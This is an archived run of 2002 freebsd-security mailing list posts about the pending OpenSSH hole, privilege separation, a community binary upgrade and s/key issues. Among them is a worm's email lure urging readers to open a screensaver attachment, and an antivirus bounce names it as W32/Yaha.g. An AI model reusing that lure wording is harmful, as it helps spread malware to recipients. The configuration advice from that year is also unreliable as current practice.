Jun 2002 11:38:30 +1200 (NZST) From: Andrew McNaughton X-X-Sender: andrew@a2 To: Mike Silbersack Cc: Brian Nelson , Niels Provos , FreeBSD Security Subject: Re: ENOUGH!!! Re: [openssh-unix-announce] Re: Upcoming OpenSSH vu lner ability (fwd) In-Reply-To: <20020625164241.J59112-100000@patrocles.silby.com> Message-ID: <20020626113623.R520-100000@a2> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 25 Jun 2002, Mike Silbersack wrote: > On Tue, 25 Jun 2002, Brian Nelson wrote: > > > So far, against all odds, Brett Glass has had the most stable, > > unemotional, and responsible response to this whole issue... everyone > > else likes to yell at you when you don't trust whatever they say because > > they are "big head figures" or suffering from "Young Geek Ego(tm)". > > This just proves that there is an exploit in the wild, and that someone > has hacked Brett's box and is impersonating him. :) This gets really tedious. grow up. Andrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 17:14:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from cithaeron.argolis.org (pool-138-88-127-183.res.east.verizon.net [138.88.127.183]) by hub.freebsd.org (Postfix) with ESMTP id 448E237B401; Tue, 25 Jun 2002 17:14:20 -0700 (PDT) Received: from cithaeron.argolis.org (localhost [127.0.0.1]) by cithaeron.argolis.org (8.12.3/8.12.3) with ESMTP id g5Q0E7IK005180; Tue, 25 Jun 2002 20:14:07 -0400 (EDT) (envelope-from piechota@argolis.org) Received: from localhost (piechota@localhost) by cithaeron.argolis.org (8.12.3/8.12.3/Submit) with ESMTP id g5Q0E7Wt005177; Tue, 25 Jun 2002 20:14:07 -0400 (EDT) X-Authentication-Warning: cithaeron.argolis.org: piechota owned process doing -bs Date: Tue, 25 Jun 2002 20:14:06 -0400 (EDT) From: Matt Piechota To: Theo de Raadt Cc: "Jacques A. Vidrine" , Subject: Re: Hogwash In-Reply-To: <200206250058.g5P0wgLJ021374@cvs.openbsd.org> Message-ID: <20020625200442.B5151-100000@cithaeron.argolis.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 24 Jun 2002, Theo de Raadt wrote: > > Still, we'll all be much more at ease once all the cards are on the > > table. I appreciate that you are trying to prepare users, but forgive > > me if I don't agree that witholding the details is the best approach. > > So please, humour me. Who precisely should I be telling this > information to, who isn't going to leak it, ship patches to their > customers early, etc. Since I started this (somewhat), I'll clarify what I meant: I would be nice if only a version spread were mentioned. It's implied that it's all OpenSSH before 3.3p1, but that wasn't quite clear. It talked a lot about privsep, and I was hoping that it was only a privsep problem and not affect me. Obviously, you don't want to release full details without a patch, but something along the lines of: There's a hole in OpenSSH that affects all versions. It's a remote DOS, and may cause a root hole. Use privsep if you can. I know that's almost what you said, but IMHO it's just a touch clearer, so there's no doubt what needs to be done. -- Matt Piechota To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 17:22: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from nu.binary.net (nu.binary.net [216.229.0.6]) by hub.freebsd.org (Postfix) with ESMTP id 8FC7437B400 for ; Tue, 25 Jun 2002 17:22:01 -0700 (PDT) Received: from deskpuppy.ops.binary.net (xanadu-pub.binary.net [216.229.9.34]) by nu.binary.net (Postfix) with ESMTP id DE4309BE0E; Tue, 25 Jun 2002 19:21:59 -0500 (CDT) Received: by deskpuppy.ops.binary.net (Postfix, from userid 1000) id 30C95ECDD4; Tue, 25 Jun 2002 19:21:16 -0500 (CDT) Date: Tue, 25 Jun 2002 19:21:16 -0500 From: Blaine Kahle To: ggm@apnic.net Cc: security@freebsd.org Subject: Re: Random address in asia != APNIC Message-ID: <20020626002116.GF2718@deskpuppy.ops.binary.net> Mail-Followup-To: ggm@apnic.net, security@freebsd.org References: <30409.1025047408@durian.apnic.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <30409.1025047408@durian.apnic.net> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 09:23:28AM +1000, ggm@apnic.net wrote: > Blaine Kahle Said in security@freebsd.org: > > And I think it's being scanned for: > > > > Jun 25 16:10:06 aspire sshd[26012]: scanned from 203.74.9.16 with > > SSH-1.0-SSH_Version_Mapper. Don't panic. > > Jun 25 16:10:06 aspire sshd[26009]: Did not receive identification string > > from 203.74.9.16 > > > >203.74.9.16 is APNIC. > > Please, if you work in a 'security' domain in FreeBSD, do not, ever > attribute random addresses to the Internet Registry that allocated > them. > > APNIC, RIPE, ARIN (and soon LACNIC and AFRNIC) are registries. They > are not the source, they provision the handing out of the addresses. > > They are not responsible for the packet source, or destination of > arbitrary flows in the internet. > > Indeed, whois contact information is often out of date, and the whois > returns the /8 network region which is the parent block, but that > doesn't make the packets 'ours' -It just means we're doing the best we > can to tell you where the addresses were obtained. Not where they are > used, not where the sender is. > > If you run, configure, write code which intuits owners from whois, can > you not propagate this mistake please? I apologize. It was a bad statement from a burnt-out admin. Rest and reflection have made me very repentant concerning that line. I am aware of the role of the registry, and my poor choice of words was not intended to imply that the packet was actually from APNIC, the registry. I am also sorry for the misuse of "APNIC" in trying to convey my assumptions about the origin and intent of the SSH scan. -- Blaine Kahle blaine@binary.net Systems Programmer Binary Net, Inc. UID 0, Zip, Zilch, Nada www.binary.net 0x178AA0E0 Do not meddle in the affairs of sysadmins, for they are quick to anger and have no need for subtlety. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 17:38:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 4EF2E37B403 for ; Tue, 25 Jun 2002 17:38:29 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id SAA02864; Tue, 25 Jun 2002 18:38:03 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020625183521.00dd9af0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 25 Jun 2002 18:37:56 -0600 To: "Jeroen C.van Gelderen" From: Brett Glass Subject: Re: ENOUGH!!! Re: [openssh-unix-announce] Re: Upcoming OpenSSH vu lner ability (fwd) Cc: Mike Silbersack , Brian Nelson , Niels Provos , FreeBSD Security In-Reply-To: References: <4.3.2.7.2.20020625173402.00b4af00@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Sure! I'll send a note under separate cover with a location where it can be downloaded via HTTP. The important thing is to add the lines UsePrivilegeSeparation yes Compression yes to sshd_config, and also to delete any lines that the newer version complains about (e.g. CheckMail). --Brett At 05:45 PM 6/25/2002, Jeroen C.van Gelderen wrote: >On Tuesday, June 25, 2002, at 07:37 , Brett Glass wrote: > >>Geeze.... Just when someone finally says something nice about >>me on this list.... ;-) >> >>Seriously, though, I'm just being practical. BTW, I've finally >>managed to build a working binary package that will replace the \ >>built-in OpenSSH in place on 4.4, 4.5, and 4.5-RELEASE. You >>may have to change /etc/ssh/sshd_config by hand afterward, but >>then you'll get privilege separation. Anyone who would like >> download or would like to post it, just e-mail. > >That sounds real good (TM). I could put it up for download if you want? > >-J > > >> >>--Brett >> >> >>At 03:43 PM 6/25/2002, Mike Silbersack wrote: >> >> >>>On Tue, 25 Jun 2002, Brian Nelson wrote: >>> >>>>So far, against all odds, Brett Glass has had the most stable, >>>>unemotional, and responsible response to this whole issue... everyone >>>>else likes to yell at you when you don't trust whatever they say because >>>>they are "big head figures" or suffering from "Young Geek Ego(tm)". >>> >>>This just proves that there is an exploit in the wild, and that someone >>>has hacked Brett's box and is impersonating him. :) >>> >>>Mike "Silby" Silbersack >>> >>> >>>To Unsubscribe: send mail to majordomo@FreeBSD.org >>>with "unsubscribe freebsd-security" in the body of the message >> >> >>To Unsubscribe: send mail to majordomo@FreeBSD.org >>with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 18:45: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 253A237B400 for ; Tue, 25 Jun 2002 18:44:59 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id TAA03603 for ; Tue, 25 Jun 2002 19:44:52 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020625194026.03128420@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 25 Jun 2002 19:44:43 -0600 To: security@FreeBSD.ORG From: Brett Glass Subject: Binary upgrade available Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thanks to Jeroen, a binary package that updates the OpenSSH in the base FreeBSD install to 3.3p1 is available at http://bob.cryptohill.net/~gelderen/openssh-overwrite-base-3.3p1_1.tgz This package will install right over the base install in FreeBSD 4.4, 4.5, and 4.6, and will create the necessary pseudo-user, group, and chroot directory for privilege separation. It won't touch your existing sshd_config, so you'll need to add UsePrivilegeSeparation yes Compression yes to that file and remove any obsolete directives that this new version complains about. Hopefully, this will speed administrators' jobs as they try to plug the OpenSSH hole before next week. --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 19:50:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from spork.pantherdragon.org (spork.pantherdragon.org [206.29.168.146]) by hub.freebsd.org (Postfix) with ESMTP id 63F7837B410 for ; Tue, 25 Jun 2002 19:50:21 -0700 (PDT) Received: from spark.techno.pagans (spark.techno.pagans [4.61.202.145]) by spork.pantherdragon.org (Postfix) with ESMTP id 6B123471DA; Tue, 25 Jun 2002 19:50:20 -0700 (PDT) Received: from pantherdragon.org (speck.techno.pagans [172.21.42.2]) by spark.techno.pagans (Postfix) with ESMTP id 19DE8FEBE; Tue, 25 Jun 2002 19:50:17 -0700 (PDT) Message-ID: <3D192BE8.99609932@pantherdragon.org> Date: Tue, 25 Jun 2002 19:50:16 -0700 From: Darren Pilgrim X-Mailer: Mozilla 4.76 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Marco Wertejuk Cc: Chris Johnson , security@FreeBSD.ORG Subject: Re: openssh-portable and s/key passwords References: <20020625133550.GB57228@palomine.net> <20020625155554.GA12933@beta.mwcis.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Marco Wertejuk wrote: > > Hello Chris, > > please check if you edited the right configfile, since > the openssh port uses /usr/local/etc not /etc. If you installed openssh-portable with -DOPENSSH_OVERWRITE_BASE, the correct location for the config files is still /etc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 19:58:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from norton.palomine.net (dsl254-102-179.nyc1.dsl.speakeasy.net [216.254.102.179]) by hub.freebsd.org (Postfix) with SMTP id C4B0A37B404 for ; Tue, 25 Jun 2002 19:58:30 -0700 (PDT) Received: (qmail 68764 invoked by uid 1000); 26 Jun 2002 02:58:29 -0000 Date: Tue, 25 Jun 2002 22:58:29 -0400 From: Chris Johnson To: security@FreeBSD.ORG Subject: Re: openssh-portable and s/key passwords Message-ID: <20020626025829.GA68663@palomine.net> References: <20020625133550.GB57228@palomine.net> <20020625155554.GA12933@beta.mwcis.com> <3D192BE8.99609932@pantherdragon.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="fUYQa+Pmc3FrFX/N" Content-Disposition: inline In-Reply-To: <3D192BE8.99609932@pantherdragon.org> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --fUYQa+Pmc3FrFX/N Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jun 25, 2002 at 07:50:16PM -0700, Darren Pilgrim wrote: > Marco Wertejuk wrote: > >=20 > > Hello Chris, > >=20 > > please check if you edited the right configfile, since > > the openssh port uses /usr/local/etc not /etc. >=20 > If you installed openssh-portable with -DOPENSSH_OVERWRITE_BASE, the > correct location for the config files is still /etc. I did not. The relevant config file is /usr/local/etc/sshd_config. Can anyone confirm that s/key does indeed work with openssh-portable? Is th= ere a PAM issue? Chris --fUYQa+Pmc3FrFX/N Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9GS3UPC78Lz4X/PARAoXtAJ9jN9LPg/WOmgrjb3AkkcxkUQZljACfVF0V w4agKvYnXvmiZtDxYsD6cNc= =izZx -----END PGP SIGNATURE----- --fUYQa+Pmc3FrFX/N-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 20:50:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from scoobysnax.jaded.net (d141-7-230.home.cgocable.net [24.141.7.230]) by hub.freebsd.org (Postfix) with ESMTP id AEC3537B400 for ; Tue, 25 Jun 2002 20:50:12 -0700 (PDT) Received: from scoobysnax.jaded.net (localhost [127.0.0.1]) by scoobysnax.jaded.net (8.12.3/8.12.3) with ESMTP id g5Q3oHAO023036; Tue, 25 Jun 2002 23:50:17 -0400 (EDT) (envelope-from dan@scoobysnax.jaded.net) Received: (from dan@localhost) by scoobysnax.jaded.net (8.12.3/8.12.3/Submit) id g5Q3oHcR023035; Tue, 25 Jun 2002 23:50:17 -0400 (EDT) Date: Tue, 25 Jun 2002 23:50:17 -0400 From: Dan Moschuk To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: Binary upgrade available Message-ID: <20020626035017.GA21220@scoobysnax.jaded.net> References: <4.3.2.7.2.20020625194026.03128420@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <4.3.2.7.2.20020625194026.03128420@localhost> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org | Thanks to Jeroen, a binary package that updates the OpenSSH in the base | FreeBSD install to 3.3p1 is available at | | http://bob.cryptohill.net/~gelderen/openssh-overwrite-base-3.3p1_1.tgz [snip] Thanks for taking the time to do this Brett! -Dan -- That poverty is no disaster is understood by everyone who has not yet succumbed to the madness of greed and luxury that turns everything topsy-turvy. -- Seneca To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 23:22:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mta2-rme.xtra.co.nz (mta2-rme.xtra.co.nz [210.86.15.130]) by hub.freebsd.org (Postfix) with ESMTP id E7EBA37B415 for ; Tue, 25 Jun 2002 23:22:14 -0700 (PDT) Received: from netxsecure.net ([210.54.78.112]) by mta2-rme.xtra.co.nz with ESMTP id <20020626062213.INJT25388.mta2-rme.xtra.co.nz@netxsecure.net> for ; Wed, 26 Jun 2002 18:22:13 +1200 Message-ID: <3D195F1E.13BAA57A@netxsecure.net> Date: Wed, 26 Jun 2002 18:28:46 +1200 From: "Michael A. Williams" Reply-To: mike@netxsecure.net X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.4-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd security Subject: Updated Anti-Trojan kernel patches for FreeBSD 4.6 Release. Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, Updated kernel option signed_exec patches for FreeBSD 4.6 Release are available from: http://www.trojanproof.org/sigexec-fbsd4.6r-0.1.tgz The relevant CVS revisions are: $FreeBSD: src/sys/i386/conf/GENERIC,v 1.246.2.42 2002/05/04 06:47:24 msmith Exp $ $FreeBSD: src/sys/conf/options,v 1.191.2.40 2002/04/30 17:48:08 tmm Exp $ $FreeBSD: src/sys/kern/kern_exec.c,v 1.107.2.14 2002/04/21 13:06:23 nectar Exp $ $FreeBSD: src/sys/kern/kern_linker.c,v 1.41.2.3 2001/11/21 17:50:35 luigi Exp $ Note that this is our original inline reference code simply updated for FreeBSD 4.6 and not the new V2 code which is still available as a beta only for OpenBSD 3.1 Release. We are working on a FreeBSD upgrade to the V2 code. Also Note that to apply these patches to the 4.6 Stable branch as of this date the /sys/i386/conf/GENERIC file in stable has been updated to 1.246.2.43 Simply do not apply the GENERIC.diff patch we have supplied if your tracking stable and instead make sure to add the following option to your kernel config file: options SIGNED_EXEC #md5 signature check exec Regards, Mike. -- Michael A. Williams Security Software Engineering and InfoSec Manager NetXSecure NZ Limited, http://www.nxs.co.nz Ph: +64.3.318.2973 Fax: +64.3.318.2975 Mob: +64.21.995.914 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 1:18:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from hokkshideh2.jetcafe.org (hokkshideh2.jetcafe.org [205.147.43.8]) by hub.freebsd.org (Postfix) with ESMTP id AE65537B400 for ; Wed, 26 Jun 2002 01:18:43 -0700 (PDT) Received: from hokkshideh2.jetcafe.org (localhost [127.0.0.1]) by hokkshideh2.jetcafe.org (8.11.6/8.11.6) with ESMTP id g5Q8Ic090366 for ; Wed, 26 Jun 2002 01:18:38 -0700 (PDT) (envelope-from dave@hokkshideh2.jetcafe.org) Message-Id: <200206260818.g5Q8Ic090366@hokkshideh2.jetcafe.org> X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 To: freebsd-security@FreeBSD.ORG Subject: Re: Hogwash Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 26 Jun 2002 01:18:33 -0700 From: Dave Hayes Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Sheldon Hearn writes: > It seems to me that a number of people have chosen to use this situation > as an opportunity for some Theo-bashing. Very poor show, I think. Theo-bashing? No. There's a simple human phenomena going on. Remember when some kid ran around saying "I have a secret and I'm not going to tell you!"? Remember how mad it made you feel? This is the exact same thing, only with adult justifications butressing up both sides of the issue. Don't confuse the justifications (which may or may not be right) with the emotions involved. Theo isn't bad. His detractors aren't bad. No one is bad. As for me, I'm going to let them play. If I want to know about the the bug...I'll study the code for a while. If I don't have time to do that, I'll wait for the patch. The rest is irrelavent. =) ------ Dave Hayes - Consultant - Altadena CA, USA - dave@jetcafe.org >>> The opinions expressed above are entirely my own <<< Men do not stumble over mountains, but over molehills. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 1:36:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from hokkshideh2.jetcafe.org (hokkshideh2.jetcafe.org [205.147.43.8]) by hub.freebsd.org (Postfix) with ESMTP id B4C8937B401 for ; Wed, 26 Jun 2002 01:36:39 -0700 (PDT) Received: from hokkshideh2.jetcafe.org (localhost [127.0.0.1]) by hokkshideh2.jetcafe.org (8.11.6/8.11.6) with ESMTP id g5Q8a2090546; Wed, 26 Jun 2002 01:36:02 -0700 (PDT) (envelope-from dave@hokkshideh2.jetcafe.org) Message-Id: <200206260836.g5Q8a2090546@hokkshideh2.jetcafe.org> X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: Binary upgrade available Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 26 Jun 2002 01:35:57 -0700 From: Dave Hayes Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Some of us use the openssh port because openssh is a moving target. I noticed the port is updated to 3.3, and found this in the CVS logs: Revision 1.99 / (download) - annotate - [select for diffs], Mon Jun 24 22:57:12 2002 UTC (33 hours, 35 minutes ago) by dinoex Branch: MAIN Changes since 1.98: +15 -8 lines Diff to previous 1.98 (colored) Enable privilege separation as default, create user and home if it not exists. So unless I'm missing something, people who track the ports tree and install openssh from it can use the latest port, turn privsep on, and they are now considered immune from this particular exploit. Anyone see a flaw in that logic? ------ Dave Hayes - Consultant - Altadena CA, USA - dave@jetcafe.org >>> The opinions expressed above are entirely my own <<< It is your attachment to objects which makes you blind and deaf. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 3:47:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from mxout2.netvision.net.il (mxout2.netvision.net.il [194.90.9.21]) by hub.freebsd.org (Postfix) with ESMTP id 0108C37B401 for ; Wed, 26 Jun 2002 03:47:05 -0700 (PDT) Received: from mailgw.netvision.net.il ([62.0.165.108]) by mxout2.netvision.net.il (iPlanet Messaging Server 5.2 HotFix 0.6 (built Jun 11 2002)) with SMTP id <0GYB004A17ABNC@mxout2.netvision.net.il> for freebsd-security@freebsd.org; Wed, 26 Jun 2002 13:47:04 +0300 (IDT) Date: Wed, 26 Jun 2002 13:45:57 +0000 (PM) From: Hotel Shefayim Subject: Fw: love speaks from the heart ! To: freebsd-security@freebsd.org Message-id: <0GYB004A27ABNC@mxout2.netvision.net.il> MIME-version: 1.0 X-Mailer: Microsoft Outlook Express 5.50.4133.2400 Content-type: multipart/mixed; boundary="Boundary_(ID_ukKiO6jZx/f3vVSeGh9ypw)" iPlanet-SMTP-Warning: Lines longer than SMTP allows found and truncated. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --Boundary_(ID_ukKiO6jZx/f3vVSeGh9ypw) Content-type: text/html Content-transfer-encoding: quoted-printable charset="iso-8859-1" Hi
Check the Attachement ..

Hotel Shefayim

----- Original Message -----
From: "friends" < passionup@friends.com >
To: < shefayim@netvision.net.il >
Sent: Wed,26 Jun 2002 13:45:57 PM
Subject: love speaks from the heart !


This e-mail is never sent unsolicited. If you need to unsubscribe,
follow the instructions at the bottom of the message.
***********************************************************

Enjoy this friendship Screen Saver and Check ur friends circle...

Send this screensaver from www.friends.com to everyone you
consider a FRIEND, even if it means sending it back to the person
who sent it to you. If it comes back to you, then you'll know you
have a circle of friends.

* To remove yourself from this mailing list, point your browser to:
http://friends.com/remove?freescreensaver
* Enter your email address (shefayim@netvision.net.il) in the field provided and click "Unsubscribe".

OR... ; Wed, 26 Jun 2002 03:48:47 -0700 (PDT) From: LNTS/Technical_Support/HTC%HTC X-Priority: 3 (Normal) Date: Wed, 26 Jun 2002 12:48:30 +0200 Subject: Report to Recipient(s) To: freebsd-security@freebsd.org Message-ID: X-MIMETrack: Serialize by Router on Domino/HTC(Release 5.0.9 |November 16, 2001) at 26.06.2002 12:49:29 MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Incident Information:- Originator: owner-freebsd-security@FreeBSD.ORG Recipients: freebsd-security@freebsd.org Subject: Fw: love speaks from the heart ! WARNING: The file friends4u.scr you received was infected with the W32/Yaha.g@MM virus. The file attachment was not successfully cleaned. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 3:59:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from antalya.lupe-christoph.de (pD9E8883F.dip0.t-ipconnect.de [217.232.136.63]) by hub.freebsd.org (Postfix) with ESMTP id 554FC37B401 for ; Wed, 26 Jun 2002 03:59:33 -0700 (PDT) Received: by antalya.lupe-christoph.de (Postfix, from userid 1000) id 3EA80789; Wed, 26 Jun 2002 12:59:30 +0200 (CEST) Date: Wed, 26 Jun 2002 12:59:30 +0200 To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: Binary upgrade available Message-ID: <20020626105930.GA16936@lupe-christoph.de> References: <4.3.2.7.2.20020625194026.03128420@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <4.3.2.7.2.20020625194026.03128420@localhost> User-Agent: Mutt/1.3.28i From: lupe@lupe-christoph.de (Lupe Christoph) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tuesday, 2002-06-25 at 19:44:43 -0600, Brett Glass wrote: > Thanks to Jeroen, a binary package that updates the OpenSSH in the base > FreeBSD install to 3.3p1 is available at Thanks for the package, *but* ;-) It hangs trying to resolve the client address when I activate privsep. I have a few Debian machines; this does not happen with the Debian package. I can't strace it far enough to see what's happening. Putting an /etc/hosts into the jail does not help. A resolv.conf does. Strange, hum? I suppose the Linux code takes a slightly different path. I don't run nscd on the Linux boxen. So they must access resolv.conf earlier. Maybe the package should copy /etc/resolv.conf to /usr/empty/etc/resolv.conf. Are other users of this package experiencing the same delay? Lupe Christoph -- | lupe@lupe-christoph.de | http://www.lupe-christoph.de/ | | I have challenged the entire ISO-9000 quality assurance team to a | | Bat-Leth contest on the holodeck. They will not concern us again. | | http://public.logica.com/~stepneys/joke/klingon.htm | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 4:35:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from noe.warszawa.mtl.pl (noe.warszawa.multinet.pl [213.241.3.26]) by hub.freebsd.org (Postfix) with ESMTP id 3916237B407 for ; Wed, 26 Jun 2002 04:35:27 -0700 (PDT) Received: by noe.warszawa.mtl.pl (Postfix, from userid 1007) id 5CBD27DF5C; Wed, 26 Jun 2002 13:35:36 +0200 (CEST) Received: from cerint.pl (white.cerint.pl [62.244.134.171]) by arka.warszawa.mtl.pl (Postfix) with ESMTP id E0097EA794; Wed, 26 Jun 2002 13:35:34 +0200 (CEST) Message-ID: <3D19A714.6000408@cerint.pl> Date: Wed, 26 Jun 2002 13:35:48 +0200 From: Marcin Gryszkalis Organization: Cerint Technology Group User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.1a) Gecko/20020619 X-Accept-Language: en-us, en, pl MIME-Version: 1.0 To: Chris Johnson Cc: security@FreeBSD.ORG Subject: Re: openssh-portable and s/key passwords References: <20020625133550.GB57228@palomine.net> <20020625155554.GA12933@beta.mwcis.com> <3D192BE8.99609932@pantherdragon.org> <20020626025829.GA68663@palomine.net> Content-Type: text/plain; charset=ISO-8859-2; format=flowed Content-Transfer-Encoding: 7bit X-AntiVirus: Poczta jest monitorowana oprogramowaniem antywirusowym. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Chris Johnson wrote: > Can anyone confirm that s/key does indeed work with openssh-portable? Is there > a PAM issue? I'm not sure if it's relevant to FreeBSD but debian advisory http://www.debian.org/security/2002/dsa-134 says: * keyboard interactive authentication does not work with privilege seperation. Most noticable for Debian users this breaks PAM modules which need a PAM conversation function (like the OPIE module). -- Marcin Gryszkalis or To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 4:37:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.dax.net (mail.dax.net [193.216.69.104]) by hub.freebsd.org (Postfix) with ESMTP id B425637B407 for ; Wed, 26 